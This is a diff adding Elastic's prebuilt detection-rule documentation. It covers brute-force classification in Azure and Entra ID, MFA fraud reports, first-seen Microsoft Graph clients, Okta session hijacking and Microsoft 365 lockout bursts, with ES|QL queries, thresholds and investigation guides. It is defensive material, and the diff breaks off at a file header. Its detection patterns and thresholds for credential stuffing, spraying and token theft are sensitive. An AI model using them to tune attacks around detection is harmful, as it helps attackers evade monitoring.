Identify if high-value accounts (e.g., administrators, service principals, federated identities) are being targeted. +- Review `login_errors`: Repetitive error types like `"Invalid Grant"` or `"User Not Found"` suggest automated attacks. +- Check `ip_list` and `source_orgs`: Investigate if the activity originates from suspicious infrastructure (VPNs, hosting providers, etc.). +- Validate `unique_ips` and `countries`: Geographic diversity and IP volume may indicate distributed or botnet-based attacks. +- Compare `total_attempts` vs `duration_seconds`: High rate of failures in a short time period implies automation. +- Analyze `user_agent.original` and `device_detail_browser`: User agents like `curl`, `Python`, or generic libraries may indicate scripting tools. +- Investigate `client_app_display_name` and `incoming_token_type`: Detect potential abuse of legacy or unattended login mechanisms. +- Inspect `target_resource_display_name`: Understand what application or resource the attacker is trying to access. +- Pivot using `session_id` and `device_detail_device_id`: Determine if a device is targeting multiple accounts. +- Review `conditional_access_status`: If not enforced, ensure Conditional Access policies are scoped correctly. + + +*False positive analysis* + + +- Legitimate automation (e.g., misconfigured scripts, sync processes) can trigger repeated failures. +- Internal red team activity or penetration tests may mimic brute-force behaviors. +- Certain service accounts or mobile clients may generate repetitive sign-in noise if not properly configured. + + +*Response and remediation* + + +- Notify your identity security team for further analysis. +- Investigate and lock or reset impacted accounts if compromise is suspected. +- Block offending IPs or ASNs at the firewall, proxy, or using Conditional Access. +- Confirm MFA and Conditional Access are enforced for all user types. +- Audit targeted accounts for credential reuse across services. +- Implement account lockout or throttling for failed sign-in attempts where possible. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* + +// Define a time window for grouping and maintain the original event timestamp +| eval Esql.time_window_date_trunc = date_trunc(15 minutes, @timestamp) + +// Filter relevant failed authentication events with specific error codes +| where event.dataset == "azure.signinlogs" + and event.category == "authentication" + and azure.signinlogs.category in ("NonInteractiveUserSignInLogs", "SignInLogs") + and event.outcome == "failure" + and azure.signinlogs.properties.authentication_requirement == "singleFactorAuthentication" + and azure.signinlogs.properties.status.error_code in ( + 50034, // UserAccountNotFound + 50126, // InvalidUsernameOrPassword + 50055, // PasswordExpired + 50056, // InvalidPassword + 50057, // UserDisabled + 50064, // CredentialValidationFailure + 50076, // MFARequiredButNotPassed + 50079, // MFARegistrationRequired + 50105, // EntitlementGrantsNotFound + 70000, // InvalidGrant + 70008, // ExpiredOrRevokedRefreshToken + 70043, // BadTokenDueToSignInFrequency + 80002, // OnPremisePasswordValidatorRequestTimedOut + 80005, // OnPremisePasswordValidatorUnpredictableWebException + 50144, // InvalidPasswordExpiredOnPremPassword + 50135, // PasswordChangeCompromisedPassword + 50142, // PasswordChangeRequiredConditionalAccess + 120000, // PasswordChangeIncorrectCurrentPassword + 120002, // PasswordChangeInvalidNewPasswordWeak + 120020 // PasswordChangeFailure + ) + and azure.signinlogs.properties.user_principal_name is not null and azure.signinlogs.properties.user_principal_name != "" + and user_agent.original != "Mozilla/5.0 (compatible; MSAL 1.0) PKeyAuth/1.0" + and source.`as`.organization.name != "MICROSOFT-CORP-MSN-as-BLOCK" + +| stats + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser), + Esql.azure_signinlogs_properties_device_detail_device_id_values = values(azure.signinlogs.properties.device_detail.device_id), + Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system), + Esql.azure_signinlogs_properties_incoming_token_type_values = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_user_id_values = values(azure.signinlogs.properties.user_id), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_signature_values = values(azure.signinlogs.result_signature), + Esql.azure_signinlogs_result_type_values = values(azure.signinlogs.result_type), + + Esql.azure_signinlogs_properties_user_id_count_distinct = count_distinct(azure.signinlogs.properties.user_id), + Esql.azure_signinlogs_properties_user_id_list = values(azure.signinlogs.properties.user_id), + Esql.azure_signinlogs_result_description_values_all = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_description_count_distinct = count_distinct(azure.signinlogs.result_description), + Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_status_error_code_count_distinct = count_distinct(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_incoming_token_type_values_all = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_app_display_name_values_all = values(azure.signinlogs.properties.app_display_name), + Esql.source_ip_values = values(source.ip), + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name), + Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name), + Esql.timestamp_first_seen = min(@timestamp), + Esql.timestamp_last_seen = max(@timestamp), + Esql.event_count = count() +by Esql.time_window_date_trunc + +| eval + Esql.duration_seconds = date_diff("seconds", Esql.timestamp_first_seen, Esql.timestamp_last_seen), + Esql.brute_force_type = case( + Esql.azure_signinlogs_properties_user_id_count_distinct >= 10 and Esql.event_count >= 30 and Esql.azure_signinlogs_result_description_count_distinct <= 3 + and Esql.source_ip_count_distinct >= 5 + and Esql.duration_seconds <= 600 + and Esql.azure_signinlogs_properties_user_id_count_distinct > Esql.source_ip_count_distinct, + "credential_stuffing", + + Esql.azure_signinlogs_properties_user_id_count_distinct >= 15 and Esql.azure_signinlogs_result_description_count_distinct == 1 and Esql.event_count >= 15 and Esql.duration_seconds <= 1800, + "password_spraying", + + (Esql.azure_signinlogs_properties_user_id_count_distinct == 1 and Esql.azure_signinlogs_result_description_count_distinct == 1 and Esql.event_count >= 30 and Esql.duration_seconds <= 300) + or (Esql.azure_signinlogs_properties_user_id_count_distinct <= 3 and Esql.source_ip_count_distinct > 30 and Esql.event_count >= 100), + "password_guessing", + + "other" + ) + +| keep + Esql.time_window_date_trunc, + Esql.brute_force_type, + Esql.duration_seconds, + Esql.event_count, + Esql.timestamp_first_seen, + Esql.timestamp_last_seen, + Esql.azure_signinlogs_properties_user_id_count_distinct, + Esql.azure_signinlogs_properties_user_id_list, + Esql.azure_signinlogs_result_description_values_all, + Esql.azure_signinlogs_result_description_count_distinct, + Esql.azure_signinlogs_properties_status_error_code_count_distinct, + Esql.azure_signinlogs_properties_status_error_code_values, + Esql.azure_signinlogs_properties_incoming_token_type_values_all, + Esql.azure_signinlogs_properties_app_display_name_values_all, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.source_as_organization_name_values, + Esql.source_geo_country_name_values, + Esql.source_geo_country_name_count_distinct, + Esql.source_as_organization_name_count_distinct, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_device_detail_browser_values, + Esql.azure_signinlogs_properties_device_detail_device_id_values, + Esql.azure_signinlogs_properties_device_detail_operating_system_values, + Esql.azure_signinlogs_properties_incoming_token_type_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_session_id_values, + Esql.azure_signinlogs_properties_user_id_values, + Esql_priv.azure_signinlogs_properties_user_principal_name_values, + Esql.azure_signinlogs_result_description_values, + Esql.azure_signinlogs_result_signature_values, + Esql.azure_signinlogs_result_type_values + +| where Esql.brute_force_type != "other" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity.asciidoc new file mode 100644 index 0000000000..6b1168a6e3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity]] +=== Microsoft Entra ID User Reported Suspicious Activity + +Identifies suspicious activity reported by users in Microsoft Entra ID where users have reported suspicious activity related to their accounts, which may indicate potential compromise or unauthorized access attempts. Reported suspicious activity typically occurs during the authentication process and may involve various authentication methods, such as password resets, account recovery, or multi-factor authentication challenges. Adversaries may attempt to exploit user accounts by leveraging social engineering techniques or other methods to gain unauthorized access to sensitive information or resources. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://chris-brumm.medium.com/microsoft-entra-mfa-fraud-deep-dive-7764fd8f76ad +* https://janbakker.tech/report-suspicious-activity-fraud-alert-for-azure-mfa/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 3 + +*Rule authors*: + +* Elastic +* Willem D'Haese + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Microsoft Entra ID User Reported Suspicious Activity* + + +This rule detects when a user in Microsoft Entra ID reports suspicious activity associated with their account. This feature is often used to report MFA fatigue or unsolicited push notifications, and is logged during authentication flows involving methods like Microsoft Authenticator. Such events may indicate that an attacker attempted unauthorized access and triggered a push that was denied or flagged by the user. + + +*Possible investigation steps* + + +- Review the `azure.auditlogs.identity` field to identify the reporting user. +- Confirm that `event.action` is `"Suspicious activity reported"` and the result was `"success"`. +- Check the `azure.auditlogs.properties.additional_details` array for `AuthenticationMethod`, which shows how the login attempt was performed (e.g., `PhoneAppNotification`). +- Look at the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` and `displayName` to confirm which user reported the suspicious activity. +- Investigate recent sign-in activity (`signinlogs`) for the same user. Focus on: + - IP address geolocation and ASN. + - Device, operating system, and browser. + - MFA prompt patterns or unusual login attempts. +- Determine whether the user actually initiated a login attempt, or if it was unexpected and aligns with MFA fatigue or phishing attempts. +- Correlate this report with any risky sign-in detections, conditional access blocks, or password resets in the past 24–48 hours. + + +*False positive analysis* + + +- Users unfamiliar with MFA push notifications may mistakenly report legitimate sign-in attempts. +- Shared accounts or device switching can also trigger unintended notifications. +- Legitimate travel or network changes might confuse users into thinking activity was malicious. + + +*Response and remediation* + + +- Contact the user to validate the suspicious activity report and assess whether they were targeted or tricked by a malicious actor. +- If the report is confirmed to be valid: + - Reset the user’s credentials immediately. + - Revoke active sessions and refresh tokens. + - Review their activity across Microsoft 365 services for signs of compromise. +- If other users report similar behavior around the same time, assess for a broader MFA fatigue campaign or targeted phishing. +- Consider tuning conditional access policies to require number matching or stronger MFA mechanisms. +- Educate users on reporting suspicious MFA prompts and following up with IT/security teams promptly. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.auditlogs" + and azure.auditlogs.operation_name: "Suspicious activity reported" + and azure.auditlogs.properties.additional_details.key: "AuthenticationMethod" + and azure.auditlogs.properties.target_resources.*.type: "User" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request.asciidoc new file mode 100644 index 0000000000..75d4233396 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request]] +=== Microsoft Graph First Occurrence of Client Request + +This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.graphactivitylogs-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Graph +* Data Source: Microsoft Graph Activity Logs +* Resources: Investigation Guide +* Use Case: Identity and Access Audit +* Tactic: Initial Access + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Graph First Occurrence of Client Request* + + +This rule detects the first observed occurrence of a Microsoft Graph API request by a specific client application ID (`azure.graphactivitylogs.properties.app_id`) in combination with a user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) and tenant ID (`azure.tenant_id`) within the last 14 days. This may indicate unauthorized access following a successful phishing attempt, token theft, or abuse of OAuth workflows. + +Adversaries frequently exploit legitimate Microsoft or third-party application IDs to avoid raising suspicion during initial access. By using pre-consented or trusted apps to interact with Microsoft Graph, attackers can perform actions on behalf of users without triggering conventional authentication alerts or requiring additional user interaction. + + +*Possible investigation steps* + + +- Review `azure.graphactivitylogs.properties.user_principal_object_id` and correlate with recent sign-in logs for the associated user. +- Determine whether `azure.graphactivitylogs.properties.app_id` is a known and approved application in your environment. +- Investigate the `user_agent.original` field for signs of scripted access (e.g., automation tools or libraries). +- Check the source IP address (`source.ip`) and geolocation data (`source.geo.*`) for unfamiliar origins. +- Inspect `azure.graphactivitylogs.properties.scopes` to understand the level of access being requested by the app. +- Examine any follow-up Graph API activity from the same `app_id` or `user_principal_object_id` for signs of data access or exfiltration. +- Correlate with device or session ID fields (`azure.graphactivitylogs.properties.c_sid`, if present) to detect persistent or repeat activity. + + +*False positive analysis* + + +- First-time use of a legitimate Microsoft or enterprise-approved application. +- Developer or automation workflows initiating new Graph API requests. +- Valid end-user activity following device reconfiguration or new client installation. +- Maintain an allowlist of expected `app_id` values and known developer tools. +- Suppress detections from known good `user_agent.original` strings or approved source IP ranges. +- Use device and identity telemetry to distinguish trusted vs. unknown activity sources. +- Combine with session risk or sign-in anomaly signals where available. + + +*Response and remediation* + + +- Reach out to the user and verify whether they authorized the application access. +- Revoke active OAuth tokens and reset credentials if unauthorized use is confirmed. +- Search for additional Graph API calls made by the same `app_id` or `user_principal_object_id`. +- Investigate whether sensitive resources (mail, files, Teams, contacts) were accessed. +- Apply Conditional Access policies to limit Graph API access by app type, IP, or device state. +- Restrict user consent for third-party apps and enforce admin approval workflows. +- Monitor usage of new or uncommon `app_id` values across your tenant. +- Provide user education on OAuth phishing tactics and reporting suspicious prompts. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.graphactivitylogs" + and event.type: "access" + and azure.graphactivitylogs.properties.c_idtyp: "user" + and azure.graphactivitylogs.properties.client_auth_method: 0 + and http.response.status_code: 200 + and url.domain: "graph.microsoft.com" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session.asciidoc new file mode 100644 index 0000000000..e1f7877466 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session]] +=== Multiple Device Token Hashes for Single Okta Session + +This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://developer.okta.com/docs/reference/api/system-log/ +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://support.okta.com/help/s/article/session-hijacking-attack-definition-damage-defense?language=en_US +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Credential Access +* Domain: SaaS +* Resources: Investigation Guide + +*Version*: 308 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Device Token Hashes for Single Okta Session* + + +This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. + + +*Possible investigation steps:* + +- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.authentication_context.external_session_id` values can be used to pivot into the raw authentication events related to this alert. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - Authentication events have been filtered out to focus on Okta activity via established sessions. +- Review the past activities of the actor(s) involved in this action by checking their previous actions. +- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity. + - This may help determine the authentication and authorization actions that occurred between the user, Okta and application. +- Aggregate by `okta.actor.alternate_id` and `event.action` to determine the type of actions that are being performed by the actor(s) involved in this action. + - If various activity is reported that seems to indicate actions from separate users, consider deactivating the user's account temporarily. + + +*False positive analysis:* + +- It is very rare that a legitimate user would have multiple device token hashes for a single Okta session as DT hashes do not change after an authenticated session is established. + + +*Response and remediation:* + +- Consider stopping all sessions for the user(s) involved in this action. +- If this does not appear to be a false positive, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA). + - If MFA is already enabled, consider resetting MFA for the users. +- If any of the users are not legitimate, consider deactivating the user's account. +- Conduct a review of Okta policies and ensure they are in accordance with security best practices. +- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user. + - If so, confirm with the user this was a legitimate request. + - If so and this was not a legitimate request, consider deactivating the user's account temporarily. + - Reset passwords and reset MFA for the user. +- Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule. + - This should be done with caution as it may prevent legitimate alerts from being generated. + + +==== Setup + + + +*Setup* + + +The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + not event.action in ( + "policy.evaluate_sign_on", + "user.session.start", + "user.authentication.sso" + ) and + okta.actor.alternate_id != "system@okta.com" and + okta.actor.alternate_id rlike "[^@\\s]+\\@[^@\\s]+" and + okta.authentication_context.external_session_id != "unknown" +| keep + event.action, + okta.actor.alternate_id, + okta.authentication_context.external_session_id, + okta.debug_context.debug_data.dt_hash +| stats + Esql.okta_debug_context_debug_data_dt_hash_count_distinct = count_distinct(okta.debug_context.debug_data.dt_hash) + by + okta.actor.alternate_id, + okta.authentication_context.external_session_id +| where + Esql.okta_debug_context_debug_data_dt_hash_count_distinct >= 2 +| sort + Esql.okta_debug_context_debug_data_dt_hash_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Web Session Cookie +** ID: T1539 +** Reference URL: https://attack.mitre.org/techniques/T1539/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc new file mode 100644 index 0000000000..5e61386f1d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc @@ -0,0 +1,174 @@ +[[prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window]] +=== Multiple Microsoft 365 User Account Lockouts in Short Time Window + +Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray +* https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties +* https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/ +* https://github.com/0xZDH/Omnispray +* https://github.com/0xZDH/o365spray + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Threat Detection +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Multiple Microsoft 365 User Account Lockouts in Short Time Window* + + +Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. + +This rule uses ESQL aggregations and thus has dynamically generated fields. Correlation of the values in the alert document may need to be performed to the original sign-in and Graph events for further context. + + +*Investigation Steps* + + +- Review the `user_id_list`: Are specific naming patterns targeted (e.g., admin, helpdesk)? +- Examine `ip_list` and `source_orgs`: Look for suspicious ISPs or hosting providers. +- Check `duration_seconds`: A very short window with a high lockout rate often indicates automation. +- Confirm lockout policy thresholds with IAM or Entra ID admins. Did the policy trigger correctly? +- Use the `first_seen` and `last_seen` values to pivot into related authentication or audit logs. +- Correlate with any recent detection of password spraying or credential stuffing activity. +- Review the `request_type` field to identify which authentication methods were used (e.g., OAuth, SAML, etc.). +- Check for any successful logins from the same IP or ASN after the lockouts. + + +*False Positive Analysis* + + +- Automated systems with stale credentials may cause repeated failed logins. +- Legitimate bulk provisioning or scripted tests could unintentionally cause account lockouts. +- Red team exercises or penetration tests may resemble the same lockout pattern. +- Some organizations may have a high volume of lockouts due to user behavior or legacy systems. + + +*Response Recommendations* + + +- Notify affected users and confirm whether activity was expected or suspicious. +- Lock or reset credentials for impacted accounts. +- Block the source IP(s) or ASN temporarily using conditional access or firewall rules. +- Strengthen lockout and retry delay policies if necessary. +- Review the originating application(s) involved via `request_types`. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-o365.audit-* +| mv_expand event.category +| eval + Esql.time_window_date_trunc = date_trunc(5 minutes, @timestamp) +| where + event.dataset == "o365.audit" and + event.category == "authentication" and + event.provider in ("AzureActiveDirectory", "Exchange") and + event.action in ("UserLoginFailed", "PasswordLogonInitialAuthUsingPassword") and + to_lower(o365.audit.ExtendedProperties.RequestType) rlike "(oauth.*||.*login.*)" and + o365.audit.LogonError == "IdsLocked" and + to_lower(o365.audit.UserId) != "not available" and + o365.audit.Target.Type in ("0", "2", "6", "10") and + source.`as`.organization.name != "MICROSOFT-CORP-MSN-as-BLOCK" +| stats + Esql_priv.o365_audit_UserId_count_distinct = count_distinct(to_lower(o365.audit.UserId)), + Esql_priv.o365_audit_UserId_values = values(to_lower(o365.audit.UserId)), + Esql.source_ip_values = values(source.ip), + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name), + Esql.o365_audit_ExtendedProperties_RequestType_values = values(to_lower(o365.audit.ExtendedProperties.RequestType)), + Esql.timestamp_first_seen = min(@timestamp), + Esql.timestamp_last_seen = max(@timestamp), + Esql.event_count = count(*) + by Esql.time_window_date_trunc +| eval + Esql.event_duration_seconds = date_diff("seconds", Esql.timestamp_first_seen, Esql.timestamp_last_seen) +| keep + Esql.time_window_date_trunc, + Esql_priv.o365_audit_UserId_count_distinct, + Esql_priv.o365_audit_UserId_values, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.source_as_organization_name_values, + Esql.source_as_organization_name_count_distinct, + Esql.source_geo_country_name_values, + Esql.source_geo_country_name_count_distinct, + Esql.o365_audit_ExtendedProperties_RequestType_values, + Esql.timestamp_first_seen, + Esql.timestamp_last_seen, + Esql.event_count, + Esql.event_duration_seconds +| where + Esql_priv.o365_audit_UserId_count_distinct >= 10 and + Esql.event_count >= 10 and + Esql.event_duration_seconds <= 300 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address.asciidoc new file mode 100644 index 0000000000..20926bf74d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address.asciidoc @@ -0,0 +1,162 